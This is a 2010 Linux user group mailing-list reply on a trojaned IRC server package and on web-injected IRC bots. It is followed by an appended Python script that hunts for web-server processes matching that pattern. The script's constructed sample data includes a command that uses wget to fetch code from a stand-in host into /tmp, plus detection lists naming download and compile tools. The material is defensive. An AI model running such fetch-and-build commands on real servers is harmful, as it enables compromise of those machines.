
Re: [LUG] Linux Trojan Raises Malware Concerns - might be of interest


On Mon, 14 Jun 2010, Rob Beard wrote:

> On 14/06/10 11:34, Roland Tarver wrote:
>> http://www.pcworld.com/businesscenter/article/198686/linux_trojan_raises_malware_concerns.html
>>
>> Best wishes
>> roly :-)

> As they mention here, the .tar.gz file wasn't signed with a PGP key (is it 
> possible to sign .tar.gz files?).
You can sign anything - it's just a fancy checksum at the end of the day.

> I guess it proves that you have to be wary about what you download from external sites. I guess even getting stuff from say the Ubuntu PPA archives could still leave you at risk if someone packaged something nasty up as part of a program.
It's possibly not as bad as some of the security flaws of Windows but still 
not good, at least for those folks running that particular IRC server.
Fortunately, the application that was compromised does the right thing and 
doesn't need to be root to run - however there's still a lot of damage 
that you can do without being root - possibly not to the local machine 
(which often isn't the aim of the perpetrators), but to be used as remote 
"zombies" to send spam, launch DoS attacks, do remote ssh probes, and so 
on.
I've recovered a few packages that do this sort of thing off my (customer) 
servers - they're packages injected into the server via web 
vulnerabilities (e.g. bulletin boards with sloppy coding installed by a 
naive client who didn't bother to read the security warnings), and just 
run away in the background waiting for a command - ironically a lot of 
them pose as an IRC client, logging onto various IRC servers and getting 
commands via IRC...
The injection technique is often very clever - you get the ability to run 
a basic command, then they use that to wget the source code, compile it 
and run it... It all runs as 'www-data' (the apache web server user), then 
just ticks away...
There are lots of these types of things out there in the wild - I guess the 
journos just haven't gotten round to giving them the red-top treatment 
yet.
Given the resources I could do inbound filtering/front-ending of the 
servers, and there is a lot of software and hardware to do just this, and 
some places do, but I don't seem to have posh enough clients who care 
enough to pay for it. (Some will argue that everyone who hosts sites ought 
to offer it as standard, but ...)
Gordon
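An added example, not part of any message in this thread: a small hunt script for the pattern Gordon describes (something injected via a web vulnerability runs as the web-server user, fetches source with wget, compiles it, and then sits on an IRC server waiting for commands). It parses a `ps`-style process listing and an `ss -tnp`-style socket listing and flags web-server-user processes that run download/compile tooling, execute from a scratch directory, or hold a connection to an IRC port. The sample listings, the user names and the port list are constructed assumptions, not data from the page; on a real box you would feed it the output of `ps -eo user,pid,ppid,comm,args` and `ss -tnp`.

```python
"""Hunt for web-server-user processes behaving like the IRC bots described in the thread.

Constructed example: the process and socket listings below are made up for
illustration and are not taken from the mailing list or any real server.
"""
import re
from dataclasses import dataclass

# Accounts a web server typically drops to (assumption; adjust for your distro).
WEB_USERS = {"www-data", "apache", "httpd"}
# Tools the thread says the injected payload uses: fetch source, build it.
TOOLING = {"wget", "curl", "gcc", "cc", "make"}
# Ports commonly used by IRC servers (assumption: 6660-6669, 6697, 7000).
IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}
# Directories the web user can write to and run from.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed `ps -eo user,pid,ppid,comm,args` output.
PS_SAMPLE = """\
USER     PID  PPID COMM    ARGS
root       1     0 init    /sbin/init
www-data 1201  1100 apache2 /usr/sbin/apache2 -k start
www-data 1345  1201 sh      sh -c cd /tmp && wget http://EXAMPLE-HOST/src.tgz
www-data 1346  1345 gcc     gcc -o /tmp/.x /tmp/x.c
www-data 1350     1 .x      /tmp/.x
postgres  900     1 postgres /usr/lib/postgresql/bin/postgres
"""

# Constructed `ss -tnp` output (peer addresses are documentation ranges).
SS_SAMPLE = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:45012 203.0.113.7:6667 users:((".x",pid=1350,fd=3))
ESTAB 0 0 10.0.0.5:80 198.51.100.2:51234 users:(("apache2",pid=1201,fd=5))
"""


@dataclass
class Proc:
    user: str
    pid: int
    ppid: int
    comm: str
    args: str


def parse_ps(text: str) -> list[Proc]:
    """Parse a ps listing; the args column may contain spaces, so split into at most 5 fields."""
    procs = []
    for line in text.splitlines()[1:]:  # skip header row
        if not line.strip():
            continue
        user, pid, ppid, comm, args = line.split(None, 4)
        procs.append(Proc(user, int(pid), int(ppid), comm, args))
    return procs


def parse_ss(text: str) -> list[tuple[int, str, int]]:
    """Return (pid, peer_host, peer_port) for each socket line that names a process."""
    conns = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        peer, process = parts[4], parts[5]
        m = re.search(r"pid=(\d+)", process)
        if not m:
            continue
        host, _, port = peer.rpartition(":")
        conns.append((int(m.group(1)), host, int(port)))
    return conns


def hunt(ps_text: str, ss_text: str) -> list[tuple[int, str]]:
    """Return (pid, reason) findings for web-user processes matching the bot pattern."""
    procs = parse_ps(ps_text)
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        if p.user not in WEB_USERS:
            continue
        # Either the command itself or any word of its command line is a fetch/build tool.
        tokens = [t.rsplit("/", 1)[-1] for t in p.args.split()]
        if p.comm in TOOLING or any(t in TOOLING for t in tokens):
            findings.append((p.pid, f"download/compile tooling in '{p.args}' running as {p.user}"))
        exe = p.args.split()[0] if p.args else ""
        if exe.startswith(SCRATCH_DIRS):
            findings.append((p.pid, f"executable launched from scratch directory: {exe}"))
    for pid, host, port in parse_ss(ss_text):
        p = by_pid.get(pid)
        if p and p.user in WEB_USERS and port in IRC_PORTS:
            findings.append((pid, f"{p.user} process '{p.comm}' connected to {host}:{port} (IRC port)"))
    return findings


if __name__ == "__main__":
    for pid, reason in hunt(PS_SAMPLE, SS_SAMPLE):
        print(f"pid {pid}: {reason}")
```

The checks are deliberately simple heuristics: a legitimate deployment may well run `make` as the web user, so treat each finding as a prompt to look at the process tree and its open files rather than as proof of compromise. The useful signal is the combination Gordon describes: a child of the web server fetching and compiling something under `/tmp`, then a process from that directory holding a long-lived outbound connection.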

--
The Mailing List for the Devon & Cornwall LUG
http://mailman.dclug.org.uk/listinfo/list
FAQ: http://www.dcglug.org.uk/linux_adm/list-faq.html